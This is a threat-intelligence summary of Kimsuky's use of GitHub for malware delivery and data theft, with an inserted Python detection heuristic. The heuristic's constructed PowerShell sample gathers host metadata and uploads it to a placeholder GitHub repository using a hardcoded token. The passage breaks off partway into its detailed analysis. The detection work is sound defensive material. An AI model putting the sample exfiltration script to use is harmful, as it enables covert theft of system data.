Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
2025.09.09
✅ Report Title: Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
✅ Executive Summary:
- S2W’s Threat Intelligence Center, TALON, has recently identified ongoing activity by the North Korea–backed APT group Kimsuky involving the abuse of GitHub repositories. A detailed analysis was conducted on the latest observed tactics.
- The threat actor leveraged a malicious LNK file to download and execute additional PowerShell-based scripts from a GitHub repository.
- To access the repository, the attacker embedded a hardcoded GitHub Private Token directly within the script.
- The PowerShell script retrieved from the repository collects system metadata including last boot time, system configuration, and running processes, writes the information into a log file, and uploads it to the attacker-controlled repository.
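As an added detection example, not part of the S2W report, the heuristic below scans PowerShell script text (for instance the contents of Script Block Logging events) for the co-occurrence of the three traits the summary describes: a hardcoded GitHub token, host metadata collection, and an upload to a GitHub repository. The `ghp_` and `github_pat_` prefixes are GitHub's documented token formats; the recon marker list, the placeholder token, the `EXAMPLE_OWNER/EXAMPLE_REPO` repository and both sample scripts are constructed assumptions of this example.

```python
import re

# Added detection heuristic, not from the S2W report: flag PowerShell script text that
# combines a hardcoded GitHub token, host reconnaissance and an upload to a GitHub repo.
# ghp_ / github_pat_ are GitHub's documented token prefixes; all else here is assumed.
GITHUB_TOKEN_RE = re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")
# PUT /repos/{owner}/{repo}/contents/{path} creates or updates a file in a repository.
CONTENTS_API_RE = re.compile(r"api\.github\.com/repos/[^/\s'\"]+/[^/\s'\"]+/contents/", re.I)
HTTP_PUT_RE = re.compile(r"\b(?:Invoke-RestMethod|Invoke-WebRequest|irm|iwr)\b[^\n]*-Method\s+PUT", re.I)
# Cmdlets and properties that yield the metadata the report lists (boot time, config, processes).
RECON_MARKERS = ("LastBootUpTime", "Win32_OperatingSystem", "systeminfo",
                 "Get-ComputerInfo", "Get-Process", "tasklist")

def classify_script(text):
    """Return the set of trait labels present in one script body."""
    traits = set()
    if GITHUB_TOKEN_RE.search(text):
        traits.add("hardcoded_github_token")
    if CONTENTS_API_RE.search(text):
        traits.add("github_contents_api")
    if HTTP_PUT_RE.search(text):
        traits.add("http_put_upload")
    lowered = text.lower()
    if any(m.lower() in lowered for m in RECON_MARKERS):
        traits.add("host_recon")
    return traits

def is_github_exfil_candidate(text):
    """Alert only when token, recon and an upload indicator co-occur; each alone is noisy."""
    t = classify_script(text)
    return ("hardcoded_github_token" in t and "host_recon" in t
            and bool({"github_contents_api", "http_put_upload"} & t))

# Constructed sample inputs: placeholder token and repository, not real indicators.
PLACEHOLDER_TOKEN = "ghp_" + "A" * 36
SUSPICIOUS_SCRIPT = f"""
$hdr = @{{ Authorization = "token {PLACEHOLDER_TOKEN}" }}
$boot = (Get-CimInstance Win32_OperatingSystem).LastBootUpTime
Get-Process | Out-File "$env:TEMP\\sys.log"
Invoke-RestMethod -Uri "https://api.github.com/repos/EXAMPLE_OWNER/EXAMPLE_REPO/contents/sys.log" -Method PUT -Headers $hdr
"""
# Legitimate admin script: token comes from the environment and the call only reads a file.
BENIGN_SCRIPT = """
$hdr = @{ Authorization = "token $env:GITHUB_TOKEN" }
Invoke-RestMethod -Uri "https://api.github.com/repos/EXAMPLE_OWNER/EXAMPLE_REPO/contents/README.md" -Headers $hdr
Get-Process | Measure-Object
"""

if __name__ == "__main__":
    for name, body in (("suspicious", SUSPICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, sorted(classify_script(body)), is_github_exfil_candidate(body))
```

The benign script shares two of the four traits with the malicious one, which is why the verdict requires the token, recon and upload indicators together rather than firing on any single match.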
📌 Detailed Analysis
1) NTS_Attach.zip
- The ZIP archive contains an LNK file masquerading as an electronic tax invoice.
2) 전자세금계산서.pdf.lnk
- Executing the shortcut file disguised as a PDF launches a …